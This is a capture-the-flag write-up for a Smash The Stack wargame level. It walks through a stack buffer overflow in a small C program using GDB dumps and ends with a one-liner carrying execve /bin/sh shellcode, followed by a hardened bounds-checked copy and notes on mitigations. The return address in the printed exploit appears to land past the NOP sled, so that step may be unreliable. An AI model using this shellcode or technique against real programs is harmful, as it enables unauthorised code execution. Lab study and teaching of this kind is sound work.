Smash The Stack-Level 5

Level 5

This is the code.

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
    char buf[128];
    if(argc < 2) return 1;
    strcpy(buf, argv[1]);   /* no bounds check: argv[1] longer than 127 bytes overflows buf */
    printf("%s\n", buf);
    return 0;
}

In this code, whatever argument we pass is stored in the character array buf. The first thing you will notice is the call strcpy(buf, argv[1]); the strcpy function does not check bounds, so an attacker can stuff anything into it.

So let's try to find out when the return address gets overwritten.

level5@io:/levels$ ./level05 $(perl -e 'print "A"x128';)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

level5@io:/levels$ ./level05 $(perl -e 'print "A"x130';)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

level5@io:/levels$ ./level05 $(perl -e 'print "A"x140';)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

We found that when we overflow with 140 bytes, memory beyond buf is overwritten by the "A"s we passed as the argument, and the program segfaults.
What we can do is fill buf with a NOP (no-operation, \x90) sled plus the shellcode, followed by the buffer address that eax points to (the return address will be overwritten with this address).

Let's find out the address. I used GDB to find the address of the shellcode/eax in memory.

(gdb) disassemble main
Dump of assembler code for function main:
0x080483b4 : push ebp
0x080483b5 : mov ebp,esp
0x080483b7 : sub esp,0xa8
0x080483bd : and esp,0xfffffff0
0x080483c0 : mov eax,0x0
0x080483c5 : sub esp,eax
0x080483c7 : cmp DWORD PTR [ebp+0x8],0x1
0x080483cb : jg 0x80483d9
0x080483cd : mov DWORD PTR [ebp-0x8c],0x1
0x080483d7 : jmp 0x8048413
0x080483d9 : mov eax,DWORD PTR [ebp+0xc]
0x080483dc : add eax,0x4
0x080483df : mov eax,DWORD PTR [eax]
0x080483e1 : mov DWORD PTR [esp+0x4],eax
0x080483e5 : lea eax,[ebp-0x88]
0x080483eb : mov DWORD PTR [esp],eax
0x080483ee : call 0x80482d4
0x080483f3 : lea eax,[ebp-0x88]
0x080483f9 : mov DWORD PTR [esp+0x4],eax
0x080483fd : mov DWORD PTR [esp],0x8048524
0x08048404 : call 0x80482b4
0x08048409 : mov DWORD PTR [ebp-0x8c],0x0
0x08048413 : mov eax,DWORD PTR [ebp-0x8c]
0x08048419 : leave
0x0804841a : ret
End of assembler dump.
(gdb) break *0x080483eb
Breakpoint 1 at 0x80483eb
(gdb) break *0x08048404
Breakpoint 2 at 0x8048404
(gdb) r $(perl -e 'print "A"x128';)
Starting program: /levels/level05 $(perl -e 'print "A"x128';)

Breakpoint 1, 0x080483eb in main ()
(gdb) x/100x $esp
0xbfffdb60: 0x0804820b 0xbfffddd2 0x08048184 0x00000001
0xbfffdb70: 0x0070eff4 0xbfffdc60 0x0070fab0 0xbfffdc34
0xbfffdb80: 0x006fc242 0xbfffdc24 0x08048184 0xbfffdc18
0xbfffdb90: 0x0070fa54 0x00000000 0x00a66bb8 0x00000001
0xbfffdba0: 0x00000000 0x00000001 0x0070f8f8 0x00285ff4
0xbfffdbb0: 0x00247339 0x001733a5 0xbfffdbc8 0x0015aa75
0xbfffdbc0: 0x00285ff4 0x00000002 0x00286cc0 0x08048320
0xbfffdbd0: 0x00701040 0x0804960c 0xbfffdbe8 0x08048291
0xbfffdbe0: 0x00286304 0x00285ff4 0xbfffdc08 0x08048489
0xbfffdbf0: 0x001735a5 0x00701040 0x00000000 0x00285ff4
0xbfffdc00: 0x08048470 0x00000000 0xbfffdc88 0x0015ac76
0xbfffdc10: 0x00000002 0xbfffdcb4 0xbfffdcc0 0x00a668c8
0xbfffdc20: 0xbfffdc70 0x0177ff8e 0x0070eff4 0x0804820b
0xbfffdc30: 0x00000001 0xbfffdc70 0x00700626 0x0070fab0
0xbfffdc40: 0x00a66bb8 0x00285ff4 0x00000000 0x00000000
0xbfffdc50: 0xbfffdc88 0xdb494afc 0x0fa91d83 0x00000000
0xbfffdc60: 0x00000000 0x00000000 0x00000002 0x080482f0
0xbfffdc70: 0x00000000 0x00706210 0x0015ab9b 0x0070eff4
0xbfffdc80: 0x00000002 0x080482f0 0x00000000 0x08048311
0xbfffdc90: 0x080483b4 0x00000002 0xbfffdcb4 0x08048470
0xbfffdca0: 0x08048420 0x00701040 0xbfffdcac 0x0070f8f8
0xbfffdcb0: 0x00000002 0xbfffddc2 0xbfffddd2 0x00000000
0xbfffdcc0: 0xbfffde53 0xbfffde63 0xbfffde6e 0xbfffde90
0xbfffdcd0: 0xbfffdea3 0xbfffdeaf 0xbfffdece 0xbfffdeda
0xbfffdce0: 0xbfffdf07 0xbfffdf1d 0xbfffdf35 0xbfffdf44
(gdb) s
Single stepping until exit from function main,
which has no line number information.

Breakpoint 2, 0x08048404 in main ()
(gdb) x/10x$esp
0xbfffdb60: 0x08048524 0xbfffdb80 0x08048184 0x00000001
0xbfffdb70: 0x0070eff4 0xbfffdc60 0x0070fab0 0xbfffdc34
0xbfffdb80: 0x41414141 0x41414141
(gdb) x/100x $esp
0xbfffdb60: 0x08048524 0xbfffdb80 0x08048184 0x00000001
0xbfffdb70: 0x0070eff4 0xbfffdc60 0x0070fab0 0xbfffdc34
0xbfffdb80: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdb90: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdba0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdbb0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdbc0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdbd0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdbe0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdbf0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfffdc00: 0x08048400 0x00000000 0xbfffdc88 0x0015ac76
0xbfffdc10: 0x00000002 0xbfffdcb4 0xbfffdcc0 0x00a668c8
0xbfffdc20: 0xbfffdc70 0x0177ff8e 0x0070eff4 0x0804820b
0xbfffdc30: 0x00000001 0xbfffdc70 0x00700626 0x0070fab0
0xbfffdc40: 0x00a66bb8 0x00285ff4 0x00000000 0x00000000
0xbfffdc50: 0xbfffdc88 0xdb494afc 0x0fa91d83 0x00000000
0xbfffdc60: 0x00000000 0x00000000 0x00000002 0x080482f0
0xbfffdc70: 0x00000000 0x00706210 0x0015ab9b 0x0070eff4
0xbfffdc80: 0x00000002 0x080482f0 0x00000000 0x08048311
0xbfffdc90: 0x080483b4 0x00000002 0xbfffdcb4 0x08048470
0xbfffdca0: 0x08048420 0x00701040 0xbfffdcac 0x0070f8f8
0xbfffdcb0: 0x00000002 0xbfffddc2 0xbfffddd2 0x00000000
0xbfffdcc0: 0xbfffde53 0xbfffde63 0xbfffde6e 0xbfffde90
0xbfffdcd0: 0xbfffdea3 0xbfffdeaf 0xbfffdece 0xbfffdeda
0xbfffdce0: 0xbfffdf07 0xbfffdf1d 0xbfffdf35 0xbfffdf44

And we found that 0xbfffdb80 is the starting address of buf. So we can make an exploit like this:

$ ./level05 $(python -c 'print "\x90"*90 + "\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh" + "\xf0\xdb\xff\xbf"*20';)
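As an added example (not code from the original post): the frame offsets read off the disassembly above (buf at [ebp-0x88], saved ebp at [ebp], return address at [ebp+4]) explain why the 140-byte run segfaulted, and the bounds-checked copy beside that calculation is how the level's strcpy would be fixed. The names overflow_reaches, safe_copy and rejects_run are chosen here, and the offsets are taken from the listing rather than measured.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 128              /* char buf[128] in the level's source       */
#define BUF_TO_SAVED_EBP 0x88     /* buf is at [ebp-0x88] in the disassembly   */
#define BUF_TO_RET (BUF_TO_SAVED_EBP + 4)   /* saved ebp at [ebp], ret at [ebp+4] */

enum clobber { FITS, PADDING, SAVED_EBP, RETURN_ADDR };

/* What strcpy of a `len`-byte argument (plus its NUL) reaches, given the
   frame layout read off the page's listing (assumed here, not measured). */
enum clobber overflow_reaches(size_t len) {
    size_t written = len + 1;                 /* strcpy copies the NUL too */
    if (written <= BUF_SIZE) return FITS;
    if (written <= BUF_TO_SAVED_EBP) return PADDING;  /* slack below ebp */
    if (written <= BUF_TO_RET) return SAVED_EBP;
    return RETURN_ADDR;
}

/* Hardened replacement for strcpy(buf, argv[1]): copy only when the source
   and its NUL fit, otherwise refuse. Returns 0 on success, -1 on rejection. */
int safe_copy(char *dst, size_t dstsz, const char *src) {
    const char *end = memchr(src, '\0', dstsz);   /* never scans past dstsz */
    if (end == NULL) return -1;                   /* no NUL in range: too long */
    size_t n = (size_t)(end - src);
    memcpy(dst, src, n + 1);
    return 0;
}

/* Self-check helper: is a run of `len` 'A's rejected by safe_copy? */
int rejects_run(size_t len) {
    char src[256], dst[BUF_SIZE];
    if (len >= sizeof src) return -1;
    memset(src, 'A', len);
    src[len] = '\0';
    return safe_copy(dst, sizeof dst, src) != 0;
}

int main(int argc, char **argv) {
    char buf[BUF_SIZE];
    if (argc < 2) return 1;
    if (safe_copy(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return 1;
    }
    printf("%s\n", buf);
    return 0;
}
```

Compiling the level with -fstack-protector and running on a system with a non-executable stack and ASLR would also have stopped this particular exploit, but only the bounds check removes the bug itself.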

Find the password to next level 🙂
